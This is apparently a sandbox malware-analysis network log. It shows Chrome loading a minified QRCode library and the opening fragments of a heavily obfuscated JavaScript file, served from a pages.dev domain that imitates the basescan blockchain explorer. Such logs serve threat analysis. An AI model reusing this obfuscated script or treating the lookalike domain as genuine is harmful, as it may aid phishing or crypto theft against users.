                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC824INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58859
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxVHyKe%2FJYPTifQQESbwkcJwXKHm%2FJIBEv%2FxcWDmgfAqBZl1KQZI0UdNVjLRIu8s%2F08C7q%2FxgPA%2FPrnYxgiMdqm0bg6aiHQ2Qx1RQSo6oUyo8nB2DRo%2BGpy7Fs8p8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c65d068c2d-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC545INData Raw: 34 64 64 62 0d 0a 76 61 72 20 51 52 43 6f 64 65 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 6d 6f 64 65 3d 63 2e 4d 4f 44 45 5f 38 42 49 54 5f 42 59 54 45 2c 74 68 69 73 2e 64 61 74 61 3d 61 2c 74 68 69 73 2e 70 61 72 73 65 64 44 61 74 61 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 2c 64 3d 30 2c 65 3d 74 68 69 73 2e 64 61 74 61 2e 6c 65 6e 67 74 68 3b 65 3e 64 3b 64 2b 2b 29 7b 76 61 72 20 66 3d 74 68 69 73 2e 64 61 74 61 2e 63 68 61 72 43 6f 64 65 41 74 28 64 29 3b 66 3e 36 35 35 33 36 3f 28 62 5b 30 5d 3d 32 34 30 7c 28 31 38 33 35 30 30 38 26 66 29 3e 3e 3e 31 38 2c 62 5b 31 5d 3d 31 32 38 7c 28 32 35 38 30 34 38 26 66 29 3e 3e 3e 31 32 2c 62 5b 32 5d 3d 31 32 38 7c 28 34 30 33 32 26 66 29 3e 3e
                                                                                                                                                                                                                                              Data Ascii: 4ddbvar QRCode;!function(){function a(a){this.mode=c.MODE_8BIT_BYTE,this.data=a,this.parsedData=[];for(var b=[],d=0,e=this.data.length;e>d;d++){var f=this.data.charCodeAt(d);f>65536?(b[0]=240|(1835008&f)>>>18,b[1]=128|(258048&f)>>>12,b[2]=128|(4032&f)>>
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 65 64 44 61 74 61 2e 75 6e 73 68 69 66 74 28 32 33 39 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 29 7b 74 68 69 73 2e 74 79 70 65 4e 75 6d 62 65 72 3d 61 2c 74 68 69 73 2e 65 72 72 6f 72 43 6f 72 72 65 63 74 4c 65 76 65 6c 3d 62 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 64 61 74 61 43 61 63 68 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 64 61 74 61 4c 69 73 74 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 61 2c 62 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 61 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 2e 6c 65 6e 67 74 68 2b 22 2f 22 2b 62 29 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 26 26 30 3d 3d 61 5b 63 5d 3b 29
                                                                                                                                                                                                                                              Data Ascii: edData.unshift(239))}function b(a,b){this.typeNumber=a,this.errorCorrectLevel=b,this.modules=null,this.moduleCount=0,this.dataCache=null,this.dataList=[]}function i(a,b){if(void 0==a.length)throw new Error(a.length+"/"+b);for(var c=0;c<a.length&&0==a[c];)
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 61 5d 5b 62 5d 7d 2c 67 65 74 4d 6f 64 75 6c 65 43 6f 75 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 7d 2c 6d 61 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6d 61 6b 65 49 6d 70 6c 28 21 31 2c 74 68 69 73 2e 67 65 74 42 65 73 74 4d 61 73 6b 50 61 74 74 65 72 6e 28 29 29 7d 2c 6d 61 6b 65 49 6d 70 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3d 34 2a 74 68 69 73 2e 74 79 70 65 4e 75 6d 62 65 72 2b 31 37 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 3d 6e 65 77 20 41 72 72 61 79 28 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 29 3b 66 6f 72 28 76 61 72 20 64 3d 30
                                                                                                                                                                                                                                              Data Ascii: b);return this.modules[a][b]},getModuleCount:function(){return this.moduleCount},make:function(){this.makeImpl(!1,this.getBestMaskPattern())},makeImpl:function(a,c){this.moduleCount=4*this.typeNumber+17,this.modules=new Array(this.moduleCount);for(var d=0
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 66 5d 5b 68 5d 3b 6a 26 26 28 64 2e 62 65 67 69 6e 46 69 6c 6c 28 30 2c 31 30 30 29 2c 64 2e 6d 6f 76 65 54 6f 28 69 2c 67 29 2c 64 2e 6c 69 6e 65 54 6f 28 69 2b 65 2c 67 29 2c 64 2e 6c 69 6e 65 54 6f 28 69 2b 65 2c 67 2b 65 29 2c 64 2e 6c 69 6e 65 54 6f 28 69 2c 67 2b 65 29 2c 64 2e 65 6e 64 46 69 6c 6c 28 29 29 7d 72 65 74 75 72 6e 20 64 7d 2c 73 65 74 75 70 54 69 6d 69 6e 67 50 61 74 74 65 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 38 3b 61 3c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 38 3b 61 2b 2b 29 6e 75 6c 6c 3d 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 61 5d 5b 36 5d 26 26 28 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 61 5d 5b 36 5d 3d 30 3d 3d 61 25 32 29 3b 66 6f 72 28
                                                                                                                                                                                                                                              Data Ascii: =this.modules[f][h];j&&(d.beginFill(0,100),d.moveTo(i,g),d.lineTo(i+e,g),d.lineTo(i+e,g+e),d.lineTo(i,g+e),d.endFill())}return d},setupTimingPattern:function(){for(var a=8;a<this.moduleCount-8;a++)null==this.modules[a][6]&&(this.modules[a][6]=0==a%2);for(
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 67 3d 30 2c 68 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 31 3b 68 3e 30 3b 68 2d 3d 32 29 66 6f 72 28 36 3d 3d 68 26 26 68 2d 2d 3b 3b 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 32 3e 69 3b 69 2b 2b 29 69 66 28 6e 75 6c 6c 3d 3d 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 64 5d 5b 68 2d 69 5d 29 7b 76 61 72 20 6a 3d 21 31 3b 67 3c 61 2e 6c 65 6e 67 74 68 26 26 28 6a 3d 31 3d 3d 28 31 26 61 5b 67 5d 3e 3e 3e 65 29 29 3b 76 61 72 20 6b 3d 66 2e 67 65 74 4d 61 73 6b 28 62 2c 64 2c 68 2d 69 29 3b 6b 26 26 28 6a 3d 21 6a 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 64 5d 5b 68 2d 69 5d 3d 6a 2c 65 2d 2d 2c 2d 31 3d 3d 65 26 26 28 67 2b 2b 2c 65 3d 37 29 7d 69 66 28 64 2b 3d 63 2c 30 3e 64 7c 7c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3c 3d 64 29
                                                                                                                                                                                                                                              Data Ascii: g=0,h=this.moduleCount-1;h>0;h-=2)for(6==h&&h--;;){for(var i=0;2>i;i++)if(null==this.modules[d][h-i]){var j=!1;g<a.length&&(j=1==(1&a[g]>>>e));var k=f.getMask(b,d,h-i);k&&(j=!j),this.modules[d][h-i]=j,e--,-1==e&&(g++,e=7)}if(d+=c,0>d||this.moduleCount<=d)
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 61 79 28 72 29 2c 74 3d 30 2c 6d 3d 30 3b 64 3e 6d 3b 6d 2b 2b 29 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 62 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 6d 3c 67 5b 6a 5d 2e 6c 65 6e 67 74 68 26 26 28 73 5b 74 2b 2b 5d 3d 67 5b 6a 5d 5b 6d 5d 29 3b 66 6f 72 28 76 61 72 20 6d 3d 30 3b 65 3e 6d 3b 6d 2b 2b 29 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 62 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 6d 3c 68 5b 6a 5d 2e 6c 65 6e 67 74 68 26 26 28 73 5b 74 2b 2b 5d 3d 68 5b 6a 5d 5b 6d 5d 29 3b 72 65 74 75 72 6e 20 73 7d 3b 66 6f 72 28 76 61 72 20 63 3d 7b 4d 4f 44 45 5f 4e 55 4d 42 45 52 3a 31 2c 4d 4f 44 45 5f 41 4c 50 48 41 5f 4e 55 4d 3a 32 2c 4d 4f 44 45 5f 38 42 49 54 5f 42 59 54 45 3a 34 2c 4d 4f 44 45 5f 4b 41 4e 4a 49 3a 38 7d 2c 64 3d 7b 4c 3a 31 2c 4d 3a 30 2c 51
                                                                                                                                                                                                                                              Data Ascii: ay(r),t=0,m=0;d>m;m++)for(var j=0;j<b.length;j++)m<g[j].length&&(s[t++]=g[j][m]);for(var m=0;e>m;m++)for(var j=0;j<b.length;j++)m<h[j].length&&(s[t++]=h[j][m]);return s};for(var c={MODE_NUMBER:1,MODE_ALPHA_NUM:2,MODE_8BIT_BYTE:4,MODE_KANJI:8},d={L:1,M:0,Q
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 3b 30 21 3d 61 3b 29 62 2b 2b 2c 61 3e 3e 3e 3d 31 3b 72 65 74 75 72 6e 20 62 7d 2c 67 65 74 50 61 74 74 65 72 6e 50 6f 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 2e 50 41 54 54 45 52 4e 5f 50 4f 53 49 54 49 4f 4e 5f 54 41 42 4c 45 5b 61 2d 31 5d 7d 2c 67 65 74 4d 61 73 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 65 2e 50 41 54 54 45 52 4e 30 30 30 3a 72 65 74 75 72 6e 20 30 3d 3d 28 62 2b 63 29 25 32 3b 63 61 73 65 20 65 2e 50 41 54 54 45 52 4e 30 30 31 3a 72 65 74 75 72 6e 20 30 3d 3d 62 25 32 3b 63 61 73 65 20 65 2e 50 41 54 54 45 52 4e 30 31 30 3a 72 65 74 75 72 6e 20 30 3d 3d 63 25 33 3b 63 61
                                                                                                                                                                                                                                              Data Ascii: unction(a){for(var b=0;0!=a;)b++,a>>>=1;return b},getPatternPosition:function(a){return f.PATTERN_POSITION_TABLE[a-1]},getMask:function(a,b,c){switch(a){case e.PATTERN000:return 0==(b+c)%2;case e.PATTERN001:return 0==b%2;case e.PATTERN010:return 0==c%3;ca
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 3d 2d 31 3b 31 3e 3d 68 3b 68 2b 2b 29 69 66 28 21 28 30 3e 64 2b 68 7c 7c 64 2b 68 3e 3d 62 29 29 66 6f 72 28 76 61 72 20 69 3d 2d 31 3b 31 3e 3d 69 3b 69 2b 2b 29 30 3e 65 2b 69 7c 7c 65 2b 69 3e 3d 62 7c 7c 28 30 21 3d 68 7c 7c 30 21 3d 69 29 26 26 67 3d 3d 61 2e 69 73 44 61 72 6b 28 64 2b 68 2c 65 2b 69 29 26 26 66 2b 2b 3b 66 3e 35 26 26 28 63 2b 3d 33 2b 66 2d 35 29 7d 66 6f 72 28 76 61 72 20 64 3d 30 3b 62 2d 31 3e 64 3b 64 2b 2b 29 66 6f 72 28 76 61 72 20 65 3d 30 3b 62 2d 31 3e 65 3b 65 2b 2b 29 7b 76 61 72 20 6a 3d 30 3b 61 2e 69 73 44 61 72 6b 28 64 2c 65 29 26 26 6a 2b 2b 2c 61 2e 69 73 44 61 72 6b 28 64 2b 31 2c 65 29 26 26 6a 2b 2b 2c 61 2e 69 73 44 61 72 6b 28 64 2c 65 2b 31 29 26 26 6a 2b 2b 2c 61 2e 69 73 44 61 72 6b 28 64 2b 31 2c 65 2b
                                                                                                                                                                                                                                              Data Ascii: =-1;1>=h;h++)if(!(0>d+h||d+h>=b))for(var i=-1;1>=i;i++)0>e+i||e+i>=b||(0!=h||0!=i)&&g==a.isDark(d+h,e+i)&&f++;f>5&&(c+=3+f-5)}for(var d=0;b-1>d;d++)for(var e=0;b-1>e;e++){var j=0;a.isDark(d,e)&&j++,a.isDark(d+1,e)&&j++,a.isDark(d,e+1)&&j++,a.isDark(d+1,e+
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 67 65 78 70 28 67 2e 67 6c 6f 67 28 74 68 69 73 2e 67 65 74 28 63 29 29 2b 67 2e 67 6c 6f 67 28 61 2e 67 65 74 28 64 29 29 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 69 28 62 2c 30 29 7d 2c 6d 6f 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 2d 61 2e 67 65 74 4c 65 6e 67 74 68 28 29 3c 30 29 72 65 74 75 72 6e 20 74 68 69 73 3b 66 6f 72 28 76 61 72 20 62 3d 67 2e 67 6c 6f 67 28 74 68 69 73 2e 67 65 74 28 30 29 29 2d 67 2e 67 6c 6f 67 28 61 2e 67 65 74 28 30 29 29 2c 63 3d 6e 65 77 20 41 72 72 61 79 28 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 29 2c 64 3d 30 3b 64 3c 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 3b 64 2b 2b 29 63 5b 64 5d 3d 74 68 69 73 2e 67 65 74 28 64 29 3b 66 6f 72 28 76 61 72 20
                                                                                                                                                                                                                                              Data Ascii: gexp(g.glog(this.get(c))+g.glog(a.get(d)));return new i(b,0)},mod:function(a){if(this.getLength()-a.getLength()<0)return this;for(var b=g.glog(this.get(0))-g.glog(a.get(0)),c=new Array(this.getLength()),d=0;d<this.getLength();d++)c[d]=this.get(d);for(var
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 31 37 2c 34 33 2c 31 35 5d 2c 5b 35 2c 31 35 30 2c 31 32 30 2c 31 2c 31 35 31 2c 31 32 31 5d 2c 5b 39 2c 36 39 2c 34 33 2c 34 2c 37 30 2c 34 34 5d 2c 5b 31 37 2c 35 30 2c 32 32 2c 31 2c 35 31 2c 32 33 5d 2c 5b 32 2c 34 32 2c 31 34 2c 31 39 2c 34 33 2c 31 35 5d 2c 5b 33 2c 31 34 31 2c 31 31 33 2c 34 2c 31 34 32 2c 31 31 34 5d 2c 5b 33 2c 37 30 2c 34 34 2c 31 31 2c 37 31 2c 34 35 5d 2c 5b 31 37 2c 34 37 2c 32 31 2c 34 2c 34 38 2c 32 32 5d 2c 5b 39 2c 33 39 2c 31 33 2c 31 36 2c 34 30 2c 31 34 5d 2c 5b 33 2c 31 33 35 2c 31 30 37 2c 35 2c 31 33 36 2c 31 30 38 5d 2c 5b 33 2c 36 37 2c 34 31 2c 31 33 2c 36 38 2c 34 32 5d 2c 5b 31 35 2c 35 34 2c 32 34 2c 35 2c 35 35 2c 32 35 5d 2c 5b 31 35 2c 34 33 2c 31 35 2c 31 30 2c 34 34 2c 31 36 5d 2c 5b 34 2c 31 34 34 2c 31
                                                                                                                                                                                                                                              Data Ascii: 17,43,15],[5,150,120,1,151,121],[9,69,43,4,70,44],[17,50,22,1,51,23],[2,42,14,19,43,15],[3,141,113,4,142,114],[3,70,44,11,71,45],[17,47,21,4,48,22],[9,39,13,16,40,14],[3,135,107,5,136,108],[3,67,41,13,68,42],[15,54,24,5,55,25],[15,43,15,10,44,16],[4,144,1


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              35192.168.2.549767172.66.44.1714435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC411OUTGET /z0emk-akw98-t47wk.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC797INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 2322573
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "cc5ca23803b0882f44541c6a0461b91d"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4YVA5c0We3s8WqOLpiebghnwYglVAmM3qLgPQS6JRDCPIDyOAy8yjdvfteeb1v6%2BGQ8IF%2BHmA0PoYc3ogJU2JHY0RP%2F5%2FAzpIN1qOpd4ZMqqh8vOygdJJ6gQZDqGG6talzW7mj22RMUEmwmkke1qgr3d5luXv4jdazgasUmeEIhtfqrbsus06yHnQ0aqPEX1uhifdpr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c98ecbde93-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC572INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 66 33 36 66 2c 5f 30 78 32 65 38 31 62 31 29 7b 63 6f 6e 73 74 20 5f 30 78 35 38 64 30 62 37 3d 5f 30 78 31 33 66 33 36 66 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 63 37 32 38 31 28 5f 30 78 32 38 37 64 32 65 2c 5f 30 78 32 33 33 33 61 62 2c 5f 30 78 32 32 37 30 31 33 2c 5f 30 78 32 35 36 66 62 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 65 33 28 5f 30 78 32 35 36 66 62 66 2d 30 78 39 37 2c 5f 30 78 32 38 37 64 32 65 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 63 61 38 65 28 5f 30 78 65 62 33 32 39 62 2c 5f 30 78 63 35 63 39 31 2c 5f 30 78 35 30 61 61 38 37 2c 5f 30 78 32 32 35 38 62 39 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 65 33 28 5f 30 78 35 30 61 61 38 37 2d 20 2d 30 78 31 39 61 2c 5f 30
                                                                                                                                                                                                                                              Data Ascii: (function(_0x13f36f,_0x2e81b1){const _0x58d0b7=_0x13f36f();function _0x5c7281(_0x287d2e,_0x2333ab,_0x227013,_0x256fbf){return _0x16e3(_0x256fbf-0x97,_0x287d2e);}function _0x3eca8e(_0xeb329b,_0xc5c91,_0x50aa87,_0x2258b9){return _0x16e3(_0x50aa87- -0x19a,_0
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2a 2d 30 78 32 32 37 2b 2d 30 78 32 2a 30 78 64 63 34 2b 30 78 31 30 63 39 2a 30 78 31 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 32 38 31 28 30 78 31 62 61 34 2c 30 78 31 35 38 66 2c 30 78 31 35 30 36 2c 30 78 31 36 65 65 29 29 2f 28 2d 30 78 31 33 2a 30 78 31 38 37 2b 2d 30 78 31 63 36 2a 2d 30 78 32 2b 2d 30 78 64 2a 2d 30 78 31 66 36 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 32 38 31 28 30 78 64 65 36 2c 30 78 31 37 66 34 2c 30 78 31 62 65 34 2c 30 78 31 35 36 36 29 29 2f 28 2d 30 78 66 37 64 2b 2d 30 78 32 61 36 2a 30 78 31 2b 30 78 31 32 32 39 2a 30 78 31 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 63 61 38 65 28 30 78 31 31 64 31 2c 30 78 66 34 36 2c 30 78 65 31 39 2c 30 78 36 65 37 29 29 2f 28 30 78 62 36 39 2a 2d 30 78
                                                                                                                                                                                                                                              Data Ascii: *-0x227+-0x2*0xdc4+0x10c9*0x1))+-parseInt(_0x5c7281(0x1ba4,0x158f,0x1506,0x16ee))/(-0x13*0x187+-0x1c6*-0x2+-0xd*-0x1f6)+parseInt(_0x5c7281(0xde6,0x17f4,0x1be4,0x1566))/(-0xf7d+-0x2a6*0x1+0x1229*0x1)+parseInt(_0x3eca8e(0x11d1,0xf46,0xe19,0x6e7))/(0xb69*-0x
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 78 31 37 61 2c 5f 30 78 32 38 63 64 65 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 33 63 35 33 37 28 5f 30 78 34 61 32 39 36 31 2c 5f 30 78 31 36 63 61 62 33 2c 5f 30 78 33 30 33 30 35 30 2c 5f 30 78 38 30 61 34 61 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 65 33 28 5f 30 78 38 30 61 34 61 32 2d 20 2d 30 78 61 64 2c 5f 30 78 31 36 63 61 62 33 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 61 33 37 39 61 33 5b 5f 30 78 31 33 63 35 33 37 28 30 78 63 35 37 2c 2d 30 78 33 63 34 2c 2d 30 78 32 65 34 2c 30 78 32 31 61 29 5d 28 29 5b 5f 30 78 31 39 31 33 64 36 28 30 78 31 61 33 39 2c 30 78 31 61 30 63 2c 30 78 31 31 61 35 2c 30 78 31 36 62 63 29 5d 28 5f 30 78 31 33 63 35 33 37 28 30 78 31 65 32 35 2c 30 78 61 65 63 2c 30 78 31 61 34 65 2c 30 78 31 34 37 34 29
                                                                                                                                                                                                                                              Data Ascii: x17a,_0x28cded);}function _0x13c537(_0x4a2961,_0x16cab3,_0x303050,_0x80a4a2){return _0x16e3(_0x80a4a2- -0xad,_0x16cab3);}return _0xa379a3[_0x13c537(0xc57,-0x3c4,-0x2e4,0x21a)]()[_0x1913d6(0x1a39,0x1a0c,0x11a5,0x16bc)](_0x13c537(0x1e25,0xaec,0x1a4e,0x1474)
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 65 56 27 3a 27 69 6e 69 74 27 2c 27 7a 6d 76 6e 42 27 3a 5f 30 78 33 61 63 32 38 65 28 2d 30 78 36 30 64 2c 30 78 66 31 2c 2d 30 78 33 38 61 2c 2d 30 78 31 62 31 29 2c 27 68 66 42 79 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 64 30 61 35 2c 5f 30 78 32 64 36 62 30 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 66 64 30 61 35 2b 5f 30 78 32 64 36 62 30 37 3b 7d 2c 27 51 44 78 7a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 35 34 32 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 35 34 32 31 28 29 3b 7d 2c 27 46 52 53 6f 76 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 34 66 65 61 39 2c 5f 30 78 33 61 36 65 37 37 2c 5f 30 78 33 31 63 30 36 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 34 66 65 61 39 28 5f 30 78 33 61 36 65 37 37 2c 5f 30 78 33 31 63 30 36
                                                                                                                                                                                                                                              Data Ascii: eV':'init','zmvnB':_0x3ac28e(-0x60d,0xf1,-0x38a,-0x1b1),'hfBye':function(_0x3fd0a5,_0x2d6b07){return _0x3fd0a5+_0x2d6b07;},'QDxzi':function(_0x455421){return _0x455421();},'FRSov':function(_0x54fea9,_0x3a6e77,_0x31c06a){return _0x54fea9(_0x3a6e77,_0x31c06
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 29 7b 63 6f 6e 73 74 20 5f 30 78 34 38 30 65 66 66 3d 5f 30 78 34 32 66 62 36 61 5b 5f 30 78 31 63 61 62 33 34 28 2d 30 78 35 36 65 2c 30 78 32 33 61 2c 30 78 63 32 31 2c 30 78 33 33 39 29 5d 28 5f 30 78 34 65 63 31 34 35 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 32 66 62 36 61 3d 6e 75 6c 6c 2c 5f 30 78 34 38 30 65 66 66 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 37 36 38 61 33 36 3d 21 5b 5d 2c 5f 30 78 34 39 35 62 65 66 3b 7d 3b 7d 28 29 29 2c 5f 30 78 35 34 64 36 36 65 3d 5f 30 78 34 37 38 64 35 35 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 36 61 36 66 3d 7b 7d 3b 5f 30 78 32 31 36 61 36 66 5b 5f 30 78 39 62 38 64 32 32 28 2d 30 78 62 30 2c 30 78
                                                                                                                                                                                                                                              Data Ascii: ){const _0x480eff=_0x42fb6a[_0x1cab34(-0x56e,0x23a,0xc21,0x339)](_0x4ec145,arguments);return _0x42fb6a=null,_0x480eff;}}:function(){};return _0x768a36=![],_0x495bef;};}()),_0x54d66e=_0x478d55(this,function(){const _0x216a6f={};_0x216a6f[_0x9b8d22(-0xb0,0x
